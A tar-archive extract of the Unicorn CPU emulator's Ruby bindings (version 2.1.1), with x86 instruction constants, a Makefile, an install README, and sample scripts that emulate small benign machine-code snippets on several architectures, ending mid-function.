UC_X86_INS_VRCPSS = 1251 UC_X86_INS_VRNDSCALEPD = 1252 UC_X86_INS_VRNDSCALEPS = 1253 UC_X86_INS_VRNDSCALESD = 1254 UC_X86_INS_VRNDSCALESS = 1255 UC_X86_INS_VROUNDPD = 1256 UC_X86_INS_VROUNDPS = 1257 UC_X86_INS_VROUNDSD = 1258 UC_X86_INS_VROUNDSS = 1259 UC_X86_INS_VRSQRT14PD = 1260 UC_X86_INS_VRSQRT14PS = 1261 UC_X86_INS_VRSQRT14SD = 1262 UC_X86_INS_VRSQRT14SS = 1263 UC_X86_INS_VRSQRT28PD = 1264 UC_X86_INS_VRSQRT28PS = 1265 UC_X86_INS_VRSQRT28SD = 1266 UC_X86_INS_VRSQRT28SS = 1267 UC_X86_INS_VRSQRTPS = 1268 UC_X86_INS_VRSQRTSS = 1269 UC_X86_INS_VSCATTERDPD = 1270 UC_X86_INS_VSCATTERDPS = 1271 UC_X86_INS_VSCATTERPF0DPD = 1272 UC_X86_INS_VSCATTERPF0DPS = 1273 UC_X86_INS_VSCATTERPF0QPD = 1274 UC_X86_INS_VSCATTERPF0QPS = 1275 UC_X86_INS_VSCATTERPF1DPD = 1276 UC_X86_INS_VSCATTERPF1DPS = 1277 UC_X86_INS_VSCATTERPF1QPD = 1278 UC_X86_INS_VSCATTERPF1QPS = 1279 UC_X86_INS_VSCATTERQPD = 1280 UC_X86_INS_VSCATTERQPS = 1281 UC_X86_INS_VSHUFPD = 1282 UC_X86_INS_VSHUFPS = 1283 UC_X86_INS_VSQRTPD = 1284 UC_X86_INS_VSQRTPS = 1285 UC_X86_INS_VSQRTSD = 1286 UC_X86_INS_VSQRTSS = 1287 UC_X86_INS_VSTMXCSR = 1288 UC_X86_INS_VSUBPD = 1289 UC_X86_INS_VSUBPS = 1290 UC_X86_INS_VSUBSD = 1291 UC_X86_INS_VSUBSS = 1292 UC_X86_INS_VTESTPD = 1293 UC_X86_INS_VTESTPS = 1294 UC_X86_INS_VUNPCKHPD = 1295 UC_X86_INS_VUNPCKHPS = 1296 UC_X86_INS_VUNPCKLPD = 1297 UC_X86_INS_VUNPCKLPS = 1298 UC_X86_INS_VZEROALL = 1299 UC_X86_INS_VZEROUPPER = 1300 UC_X86_INS_WAIT = 1301 UC_X86_INS_WBINVD = 1302 UC_X86_INS_WRFSBASE = 1303 UC_X86_INS_WRGSBASE = 1304 UC_X86_INS_WRMSR = 1305 UC_X86_INS_XABORT = 1306 UC_X86_INS_XACQUIRE = 1307 UC_X86_INS_XBEGIN = 1308 UC_X86_INS_XCHG = 1309 UC_X86_INS_XCRYPTCBC = 1310 UC_X86_INS_XCRYPTCFB = 1311 UC_X86_INS_XCRYPTCTR = 1312 UC_X86_INS_XCRYPTECB = 1313 UC_X86_INS_XCRYPTOFB = 1314 UC_X86_INS_XEND = 1315 UC_X86_INS_XGETBV = 1316 UC_X86_INS_XLATB = 1317 UC_X86_INS_XRELEASE = 1318 UC_X86_INS_XRSTOR = 1319 UC_X86_INS_XRSTOR64 = 1320 UC_X86_INS_XRSTORS = 1321 UC_X86_INS_XRSTORS64 = 1322 UC_X86_INS_XSAVE = 1323 UC_X86_INS_XSAVE64 = 1324 UC_X86_INS_XSAVEC = 1325 UC_X86_INS_XSAVEC64 = 1326 UC_X86_INS_XSAVEOPT = 1327 UC_X86_INS_XSAVEOPT64 = 1328 UC_X86_INS_XSAVES = 1329 UC_X86_INS_XSAVES64 = 1330 UC_X86_INS_XSETBV = 1331 UC_X86_INS_XSHA1 = 1332 UC_X86_INS_XSHA256 = 1333 UC_X86_INS_XSTORE = 1334 UC_X86_INS_XTEST = 1335 UC_X86_INS_FDISI8087_NOP = 1336 UC_X86_INS_FENI8087_NOP = 1337 UC_X86_INS_ENDING = 1338 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015762�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/Makefile����������������������������������������������������������������0000664�0000000�0000000�00000000471�14675241067�0017424�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Ruby binding for Unicorn engine. Sascha Schirra <sashs@scoding.de> .PHONY: gen_const # Use bundle install && rake to install gem and test install: gen_const cd unicorn_gem && rake build cd unicorn_gem && gem install --local pkg/unicorn-engine-2.1.1.gem gen_const: cd .. && python3 const_generator.py ruby �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/README.md���������������������������������������������������������������0000664�0000000�0000000�00000000422�14675241067�0017237�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Installation ## Software requirements ### Linux - ruby >= 1.9.3 - rubygems - make - gcc ### Mac OS - ruby >= 1.9.3 - rubygems - make - XCode ## Install unicorn * cd path_to_unicorn * ./make.sh install ## Install ruby binding * cd bindings/ruby * make install ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_arm.rb�����������������������������������������������������������0000664�0000000�0000000�00000005460�14675241067�0020434�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/arm_const' include UnicornEngine # code to be emulated ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 THUMB_CODE = "\x83\xb0" # sub sp, #0xc # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test ARM def test_arm() puts("Emulate ARM code") begin # Initialize emulator in ARM mode mu = Uc.new UC_ARCH_ARM, UC_MODE_ARM # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_R0, 0x1234) mu.reg_write(UC_ARM_REG_R2, 0x6789) mu.reg_write(UC_ARM_REG_R3, 0x3333) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + ARM_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_ARM_REG_R0) r1 = mu.reg_read(UC_ARM_REG_R1) puts(">>> R0 = 0x%x" % r0) puts(">>> R1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end def test_thumb() puts("Emulate THUMB code") begin # Initialize emulator in thumb mode mu = Uc.new UC_ARCH_ARM, UC_MODE_THUMB # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, THUMB_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) puts(">>> SP = 0x%x" % sp) rescue UcError => e puts("ERROR: %s" % e) end end test_arm() puts("=" * 20) test_thumb() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_arm64.rb���������������������������������������������������������0000664�0000000�0000000�00000003630�14675241067�0020603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/arm64_const' include UnicornEngine # code to be emulated ARM64_CODE = "\xab\x01\x0f\x8b" #add x11, x13, x15 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test ARM64 def test_arm64() puts("Emulate ARM64 code") begin # Initialize emulator in ARM mode mu = Uc.new UC_ARCH_ARM64, UC_MODE_ARM # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM64_CODE) # initialize machine registers mu.reg_write(UC_ARM64_REG_X11, 0x1234) mu.reg_write(UC_ARM64_REG_X13, 0x6789) mu.reg_write(UC_ARM64_REG_X15, 0x3333) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + ARM64_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") x11 = mu.reg_read(UC_ARM64_REG_X11) x13 = mu.reg_read(UC_ARM64_REG_X13) x15 = mu.reg_read(UC_ARM64_REG_X15) puts(">>> X11 = 0x%x" % x11) rescue UcError => e puts("ERROR: %s" % e) end end test_arm64() ��������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_m68k.rb����������������������������������������������������������0000664�0000000�0000000�00000003317�14675241067�0020441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/m68k_const' include UnicornEngine # code to be emulated M68K_CODE = "\x76\xed" # movq #-19, %d3 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test m68k def test_m68k() puts("Emulate M68K code") begin # Initialize emulator in m68k mode mu = Uc.new UC_ARCH_M68K, UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, M68K_CODE) # initialize machine registers mu.reg_write(UC_M68K_REG_D3, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + M68K_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") d3 = mu.reg_read(UC_M68K_REG_D3) puts(">>> D3 = 0x%x" % d3) rescue UcError => e puts("ERROR: %s" % e) end end test_m68k() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_mips.rb����������������������������������������������������������0000664�0000000�0000000�00000005616�14675241067�0020630�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/mips_const' include UnicornEngine # code to be emulated MIPS_CODE_EB = "\x34\x21\x34\x56" # ori $at, $at, 0x3456; MIPS_CODE_EL = "\x56\x34\x21\x34" # ori $at, $at, 0x3456; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test MIPS EB def test_mips_eb() puts("Emulate MIPS code (big-endian)") begin # Initialize emulator in MIPS32 + EB mode mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EB) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) puts(">>> r1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end # Test MIPS EL def test_mips_el() puts("Emulate MIPS code (little-endian)") begin # Initialize emulator in MIPS32 + EL mode mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EL) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) puts(">>> r1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end test_mips_eb() puts("=" * 20) test_mips_el() ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_sparc.rb���������������������������������������������������������0000664�0000000�0000000�00000003523�14675241067�0020763�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for SPARC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/sparc_const' include UnicornEngine # code to be emulated SPARC_CODE = "\x86\x00\x40\x02" # add %g1, %g2, %g3; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test SPARC def test_sparc() puts("Emulate SPARC code") begin # Initialize emulator in SPARC EB mode mu = Uc.new UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, SPARC_CODE) # initialize machine registers mu.reg_write(UC_SPARC_REG_G1, 0x1230) mu.reg_write(UC_SPARC_REG_G2, 0x6789) mu.reg_write(UC_SPARC_REG_G3, 0x5555) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + SPARC_CODE.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") g3 = mu.reg_read(UC_SPARC_REG_G3) puts(">>> G3 = 0x%x" %g3) rescue UcError => e puts("ERROR: %s" % e) end end test_sparc() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_x86.rb�����������������������������������������������������������0000664�0000000�0000000�00000041755�14675241067�0020311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/x86_const' include UnicornEngine X86_CODE32 = "\x41\x4a" # INC ecx; DEC edx X86_CODE32_LOOP = "\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop X86_CODE32_MEM_READ = "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx X86_CODE32_MEM_WRITE = "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx X86_CODE64 = "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" X86_CODE32_INOUT = "\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx X86_CODE64_SYSCALL = "\x0f\x05" # SYSCALL X86_CODE16 = "\x00\x00" # add byte ptr [bx + si], al # memory address where emulation starts ADDRESS = 0x1000000 # callback for tracing basic blocks HOOK_BLOCK = Proc.new do |uc, address, size, user_data | puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions HOOK_CODE = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # callback for tracing invalid memory access (READ or WRITE) HOOK_MEM_INVALID = lambda do |uc, access, address, size, value, user_data| if access == UC_MEM_WRITE_UNMAPPED puts(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) # map this memory in with 2MB in size uc.mem_map(0xaaaa0000, 2 * 1024*1024) # return True to indicate we want to continue emulation return true else puts(">>> Missing memory is being READ at 0x%x" % address) # return False to indicate we want to stop emulation return false end end # callback for tracing memory access (READ or WRITE) HOOK_MEM_ACCESS = Proc.new do |uc, access, address, size, value, user_data| if access == UC_MEM_WRITE puts(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) else # READ puts(">>> Memory is being READ at 0x%x, data size = %u" % [address, size]) end end # callback for IN instruction HOOK_IN = lambda do |uc, port, size, user_data| eip = uc.reg_read(UC_X86_REG_EIP) puts("--- reading from port 0x%x, size: %u, address: 0x%x" % [port, size, eip]) if size == 1 # read 1 byte to AL return 0xf1 end if size == 2 # read 2 byte to AX return 0xf2 end if size == 4 # read 4 byte to EAX return 0xf4 end # we should never reach here return 0 end # callback for OUT instruction HOOK_OUT = Proc.new do |uc, port, size, value, user_data| eip = uc.reg_read(UC_X86_REG_EIP) puts("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" % [port, size, value, eip]) # confirm that value is indeed the value of AL/AX/EAX v = 0 if size == 1 # read 1 byte in AL v = uc.reg_read(UC_X86_REG_AL) end if size == 2 # read 2 bytes in AX v = uc.reg_read(UC_X86_REG_AX) end if size == 4 # read 4 bytes in EAX v = uc.reg_read(UC_X86_REG_EAX) end puts("--- register value = 0x%x" %v) end # Test X86 32 bit def test_i386() puts("Emulate i386 code") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED, HOOK_MEM_INVALID) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) # read from memory tmp = mu.mem_read(ADDRESS, 2) print(">>> Read 2 bytes from [0x%x] =" % (ADDRESS)) tmp.each_byte { |i| print(" 0x%x" % i) } puts rescue UcError => e puts("ERROR: %s" % e) end end def test_i386_loop() puts("Emulate i386 code with infinite loop - wait for 2 seconds then stop emulation") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_LOOP) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.bytesize, 2 * UC_SECOND_SCALE) # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) rescue UcError => e puts("ERROR: %s" % e) end end def test_i386_invalid_mem_read() puts("Emulate i386 code that read from invalid memory") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.bytesize) rescue UcError => e puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) rescue UcError => e print("ERROR: %s" % e) end end def test_i386_invalid_mem_write() puts("Emulate i386 code that write to invalid memory") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback #mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback #mu.hook_add(UC_HOOK_CODE, HOOK_CODE) # intercept invalid memory events mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, HOOK_MEM_INVALID) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.bytesize) rescue UcError => e puts "ERROR: %s" % e end # now print out some registers puts ">>> Emulation done. Below is the CPU context" r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts ">>> ECX = 0x%x" % r_ecx puts ">>> EDX = 0x%x" % r_edx begin # read from memory print ">>> Read 4 bytes from [0x%x] = " % (0xaaaaaaaa) tmp = mu.mem_read(0xaaaaaaaa, 4) tmp.each_byte { |i| print(" 0x%x" % i) } puts print ">>> Read 4 bytes from [0x%x] = " % 0xffffffaa tmp = mu.mem_read(0xffffffaa, 4) tmp.each_byte { |i| puts(" 0x%x" % i) } puts rescue UcError => e puts "ERROR: %s" % e end rescue UcError => e puts "ERROR: %s" % e end end def test_i386_context_save() puts("Save/restore CPU context in opaque blob") address = 0 code = '\x40' # inc eax begin # Initialize emulator mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 8KB memory for this emulation mu.mem_map(address, 8 * 1024, UC_PROT_ALL) # write machine code to be emulated to memory mu.mem_write(address, code) # set eax to 1 mu.reg_write(UC_X86_REG_EAX, 1) puts(">>> Running emulation for the first time") mu.emu_start(address, address+1) puts(">>> Emulation done. Below is the CPU context") puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) puts(">>> Saving CPU context") saved_context = mu.context_save() puts(">>> Running emulation for the second time") mu.emu_start(address, address+1) puts(">>> Emulation done. Below is the CPU context") puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) puts(">>> CPU context restored. Below is the CPU context") mu.context_restore(saved_context) puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) rescue UcError => e puts("ERROR: %s" % e) end end # Test X86 32 bit with IN/OUT instruction def test_i386_inout() puts("Emulate i386 code with IN/OUT instructions") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_INOUT) # initialize machine registers mu.reg_write(UC_X86_REG_EAX, 0x1234) mu.reg_write(UC_X86_REG_ECX, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) # handle IN & OUT instruction mu.hook_add(UC_HOOK_INSN, HOOK_IN, nil, 1, 0, UC_X86_INS_IN) mu.hook_add(UC_HOOK_INSN, HOOK_OUT, nil, 1, 0, UC_X86_INS_OUT) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_eax = mu.reg_read(UC_X86_REG_EAX) puts ">>> EAX = 0x%x" % r_eax puts ">>> ECX = 0x%x" % r_ecx rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_64() puts("Emulate x86_64 code") begin # Initialize emulator in X86-64bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_64 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64) # initialize machine registers mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) # setup stack mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions in range [ADDRESS, ADDRESS+20] mu.hook_add(UC_HOOK_CODE, HOOK_CODE, 0, ADDRESS, ADDRESS+20) # tracing all memory READ & WRITE access mu.hook_add(UC_HOOK_MEM_WRITE, HOOK_MEM_ACCESS) mu.hook_add(UC_HOOK_MEM_READ, HOOK_MEM_ACCESS) # actually you can also use READ_WRITE to trace all memory access #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) rescue UcError => e 